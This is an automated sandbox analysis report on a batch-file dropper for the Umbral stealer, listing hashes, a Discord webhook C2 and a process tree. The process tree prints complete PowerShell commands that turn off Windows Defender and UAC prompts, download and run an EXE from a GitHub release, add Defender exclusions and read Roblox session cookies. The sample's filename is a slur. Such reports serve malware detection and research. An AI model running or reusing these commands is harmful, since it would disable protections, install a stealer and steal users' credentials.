Analysis

  • max time kernel
    149s
  • max time network
    145s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20250314-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    23/03/2025, 22:49

General

  • Target
    nigga2.bat
  • Size
    1KB
  • MD5
    06aafbdb0650ecee01c1bdb6b7b51fdb
  • SHA1
    ad8c1f0ca620d813ce8e3280139817db583f9c4e
  • SHA256
    3b5953d3ea0420345b5c1e9efdbb88ea80bcaa99f2582834c2cd545efa84880c
  • SHA512
    039a8ca7db486f7c473a07c22c4269c211fc44175d3fb480eeaf5435df23a70151927940b0bf6a7bbc29b12b1d9a84ab5240686e05cc9daae0d54920d2d84fb9

Malware Config (extracted)

  • Family
    umbral
  • C2
    https://discord.com/api/webhooks/1346186242164916254/XSGGtSWs1IP-qhWb9F-7vKZ6AbJ1Ah-y8ACFyf9MRP2SkcfW16QzCkiWhzv0YmF7kEXM

Signatures

  • Detect Umbral payload 2 IoCs
  • UAC bypass 3 TTPs 1 IoCs
  • Umbral

    Umbral stealer is an open-source modular stealer written in C#.

  • Umbral family
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    PowerShell Invoke-WebRequest.

  • Downloads MZ/PE file 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\nigga2.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3776
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Set-ExecutionPolicy Unrestricted -Force; Set-ItemProperty -Path 'REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System' -Name 'ConsentPromptBehaviorAdmin' -Value 0; Set-MpPreference -DisableRealtimeMonitoring $true; Set-MpPreference -DisableIOAVProtection $true; Set-MpPreference -DisableBlockAtFirstSeen $true; Set-MpPreference -SubmitSamplesConsent 2; Set-Service -Name WinDefend -StartupType Disabled; Stop-Service -Name WinDefend;"
      2⤵
      • UAC bypass
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:5392
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Invoke-WebRequest -Uri 'https://github.com/pizq3/dfsdfdfs/releases/download/sex/File.1.exe' -OutFile 'C:\Users\Admin\AppData\Roaming\Local\MyApp\Runtime Broker.exe'"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Downloads MZ/PE file
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1196
    • C:\Windows\system32\timeout.exe
      timeout /t 2
      2⤵
      • Delays execution with timeout.exe
      PID:2316
    • C:\Users\Admin\AppData\Roaming\Local\MyApp\Runtime Broker.exe
      "C:\Users\Admin\AppData\Roaming\Local\MyApp\Runtime Broker.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4908
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Local\MyApp\Runtime Broker.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1152
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:392
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1440
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2296
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" os get Caption
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:5828
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" computersystem get totalphysicalmemory
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2704
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" csproduct get uuid
        3⤵
        PID:4600
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        PID:5360
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic" path win32_VideoController get name
        3⤵
        • Detects videocard installed
        PID:1888
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Add-MpPreference -ExclusionProcess 'C:\Users\Admin\AppData\Roaming\Local\MyApp\Runtime Broker.exe'"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:5548
    • C:\Windows\system32\taskmgr.exe
      "C:\Windows\system32\taskmgr.exe" /4
      1⤵
      • Checks SCSI registry key(s)
      • Checks processor information in registry
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: GetForegroundWindowSpam
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      PID:3124

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

      Filesize

      3KB

      MD5

      b385929194b875890a5f11dff37cc0b0

      SHA1

      dcafb5e5ea30dbfe0a4da43726366f6a2b0d6d1a

      SHA256

      47592ecc8084a456e10de6b4e2a96121deb12fd004c42f1f3b0e124ecc8d533b

      SHA512

      830f2b6321d300272a211f1beeebb5d4f1bdcbc3c7b4558efb438b1af5dc745f71408cec1bff51545e0250b21d7a2da68eb6d7df31eaae87065316cb43b74613

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      548dd08570d121a65e82abb7171cae1c

      SHA1

      1a1b5084b3a78f3acd0d811cc79dbcac121217ab

      SHA256

      cdf17b8532ebcebac3cfe23954a30aa32edd268d040da79c82687e4ccb044adc

      SHA512

      37b98b09178b51eec9599af90d027d2f1028202efc1633047e16e41f1a95610984af5620baac07db085ccfcb96942aafffad17aa1f44f63233e83869dc9f697b

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      107102102e02e48f37f5318c7e113c43

      SHA1

      7fb10fc65c85fb4c050309f0872bc9389dcccc0d

      SHA256

      3c3f49948c1e832c86b959c32bc288ddedb500534b74df082f8967fc7f9976f7

      SHA512

      b108a47d7c3dd154cad44362b6cd557b7064096383d100e6cd64bfb19c4e2ad878ed4ee800776322ad3cc4bb721fb675b0ecab8f5661024188fa3aa19561841b

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      38d2bbd81ef754e8dfbe6e448e60fb68

      SHA1

      c37b48ddfe4767f578a319891126e3deb8f9cbec

      SHA256

      ba033cee7b97f63d1d7ea61c775302106a92af27b979eee1a68596854fe56996

      SHA512

      b359fd91a0736e1b4b1813e0efd388f94fd11544a54575ab1010da19c639e6815130d29d961bc724e569505555b460060370b3ec3b03d11ecf10806da88e2d28

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      0f6a3762a04bbb03336fb66a040afb97

      SHA1

      0a0495c79f3c8f4cb349d82870ad9f98fbbaac74

      SHA256

      36e2fac0ab8aee32e193491c5d3df9374205e328a74de5648e7677eae7e1b383

      SHA512

      cc9ebc020ec18013f8ab4d6ca5a626d54db84f8dc2d97e538e33bb9a673344a670a2580346775012c85f204472f7f4dd25a34e59f1b827642a21db3325424b69

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      944B

      MD5

      0dfc87d52784026f73d57192cb575195

      SHA1

      720cfc0cff7f21a4ab235f5b3a16beb28ea6d9fd

      SHA256

      bfd4b6a533b4e3a2a884e6f1445f646a3d83a41f6e4060964279c9b4c87a5ef2

      SHA512

      c6c98a666ff7880bdeaae69e200ee93fe0d6e0bfd4046bd184cf5d8209fd18439f9bfb8e3e8b5e75656c3c0deaf2dea2843061df1c2a98310dd5405cb7458604

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      944B

      MD5

      88f48c82ed7aabf6b09985139fb7bf1e

      SHA1

      9ac90ae480f09c07c25344ce9ac17067ea1a22b8

      SHA256

      31763408f851819dc42f35fcc2c71cee6683937e5f42129982cdfb1cf46b8847

      SHA512

      233f033ddc883fa92c475681ee82edfb774a0a33402e9acf10f49aed62b599b753baf0ac27733723af7b7c2e31633c4a049bbd824f14e6cb55f7b917c2f74966

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      948B

      MD5

      35d9cbd358e192d96e38c1cb959f9b85

      SHA1

      3066347cf718f9f1a9df21f494bafc8647196727

      SHA256

      2e9ca12397dbea04549a456382bd2d1376ae2f7008572fe3da7198176e938956

      SHA512

      6188e89c6fa27adaf4b492bab0961e8c42232aa00252a486d40e64a6fe5fe71dc574bf39e95bf8d706d7de211140e864c697be1cc8e8ca26bcaaa1b3069a5c3a

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_feeapzau.tsu.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Roaming\Local\MyApp\Runtime Broker.exe

      Filesize

      229KB

      MD5

      d7a6b25c7efcf58e4f295fff84851c0b

      SHA1

      2b6ad97ec2085aa658cbd304b15e1b540971bfa4

      SHA256

      1ada25029046890a7d7464603fab2e95b21edab871ce27efc7975b468febeaaf

      SHA512

      0fc3d60d54580688018e9029a80f86c3fa919a71407939d8b72f3c209ae9137a889c986ce6c4338b1e1c045c93c81aa04a12a73280f9d0e77f0691a83de126cb
